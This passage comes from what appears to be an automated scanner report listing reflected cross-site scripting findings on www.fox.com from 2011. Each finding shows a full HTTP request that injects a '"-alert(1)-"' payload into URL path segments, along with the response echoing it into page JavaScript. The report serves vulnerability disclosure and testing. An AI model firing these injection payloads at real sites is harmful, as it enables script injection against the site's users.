Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 21869
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ugc:xml3f997"-alert(1)-"b5848d7db55homepage_ep_2011-10-4"
s_analytics.hier1="fox:shows:_ugc:xml3f997"-alert(1)-"b5848d7db55homepage_ep_2011-10-4" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ugc:xml3f997"-ale
...[SNIP]...

1.149. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ugc/xml/homepage_ep_2011-10-4.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a6d4"-alert(1)-"dd4b1ac882d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ugc/xml/homepage_ep_2011-10-4.xml1a6d4"-alert(1)-"dd4b1ac882d HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/flash/EditorialPod.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21757
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:10:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
s" //Site Section
s_analytics.prop7="fox:shows:_ugc" //Site Sub - Section
s_analytics.prop8="fox:shows:_ugc:xm" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ugc:xmlhomepage_ep_2011-10-4.xml1a6d4"-alert(1)-"dd4b1ac882d"
s_analytics.prop15="sub section:homepage_ep_2011-10-4" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_a
...[SNIP]...

1.150. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df44"-alert(1)-"519baa039a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui8df44"-alert(1)-"519baa039a9/fox_player/swf/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.107
Content-Type: text/html; charset=utf-8
Content-Length: 21904
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui8df44"-alert(1)-"519baa039a9:fox_playerfoxanalyticsextension"
s_analytics.hier1="fox:shows:_ui8df44"-alert(1)-"519baa039a9:fox_playerfoxanalyticsextension" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_
...[SNIP]...

1.151. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9233"-alert(1)-"c89ee70262d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_playera9233"-alert(1)-"c89ee70262d/swf/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.101
Content-Type: text/html; charset=utf-8
Content-Length: 21876
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playera9233"-alert(1)-"c89ee70262dfoxanalyticsextension"
s_analytics.hier1="fox:shows:_ui:fox_playera9233"-alert(1)-"c89ee70262dfoxanalyticsextension" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_play
...[SNIP]...

1.152. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/FoxAnalyticsExtension.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 896b7"-alert(1)-"3ed23f0e348 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player/swf896b7"-alert(1)-"3ed23f0e348/FoxAnalyticsExtension.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 21764
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:19:19 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf896b7"-alert(1)-"3ed23f0e348"
s_analytics.prop15="sub section:foxanalyticsextension" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_a
...[SNIP]...

1.153. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4335e"-alert(1)-"0accea0a5eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui4335e"-alert(1)-"0accea0a5eb/fox_player/swf/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 21880
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:16:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui4335e"-alert(1)-"0accea0a5eb:fox_playerfoxlayoutplugin"
s_analytics.hier1="fox:shows:_ui4335e"-alert(1)-"0accea0a5eb:fox_playerfoxlayoutplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui4335e"-ale
...[SNIP]...

1.154. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e53"-alert(1)-"a2469b6ef49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player91e53"-alert(1)-"a2469b6ef49/swf/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 21852
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player91e53"-alert(1)-"a2469b6ef49foxlayoutplugin"
s_analytics.hier1="fox:shows:_ui:fox_player91e53"-alert(1)-"a2469b6ef49foxlayoutplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player91e53"-ale
...[SNIP]...

1.155. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/FoxLayoutPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f3fa"-alert(1)-"6314bb53e69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player/swf4f3fa"-alert(1)-"6314bb53e69/FoxLayoutPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 21740
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:16:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf4f3fa"-alert(1)-"6314bb53e69"
s_analytics.prop15="sub section:foxlayoutplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analyti
...[SNIP]...

1.156. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c64f"-alert(1)-"60e8ceb9474 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui3c64f"-alert(1)-"60e8ceb9474/fox_player/swf/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 21892
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui3c64f"-alert(1)-"60e8ceb9474:fox_playerfoxomnituremonitor"
s_analytics.hier1="fox:shows:_ui3c64f"-alert(1)-"60e8ceb9474:fox_playerfoxomnituremonitor" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui3c64
...[SNIP]...

1.157. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29b7d"-alert(1)-"495dd8f1e73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player29b7d"-alert(1)-"495dd8f1e73/swf/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 21864
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:42 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player29b7d"-alert(1)-"495dd8f1e73foxomnituremonitor"
s_analytics.hier1="fox:shows:_ui:fox_player29b7d"-alert(1)-"495dd8f1e73foxomnituremonitor" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player29b7
...[SNIP]...

1.158. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.fox.com
Path:	/_ui/fox_player/swf/FoxOmnitureMonitor.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56b6e"-alert(1)-"81daa3b06d4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /_ui/fox_player/swf56b6e"-alert(1)-"81daa3b06d4/FoxOmnitureMonitor.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%252C%255B'D%25253Dc18'%252C'1317758812957'%255D%255D%7C1475611612957%3B%20s_vnum%3D1320123600936%2526vn%253D4%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317760612959%3B%20s_dayslastvisit%3D1317758813012%7C1412366813012%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760613012%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedwww.newscorp.comwww.newscorp.com%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.106
Content-Type: text/html; charset=utf-8
Content-Length: 21752
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:11:45 GMT
Connection: close
Vary: Accept-Encoding

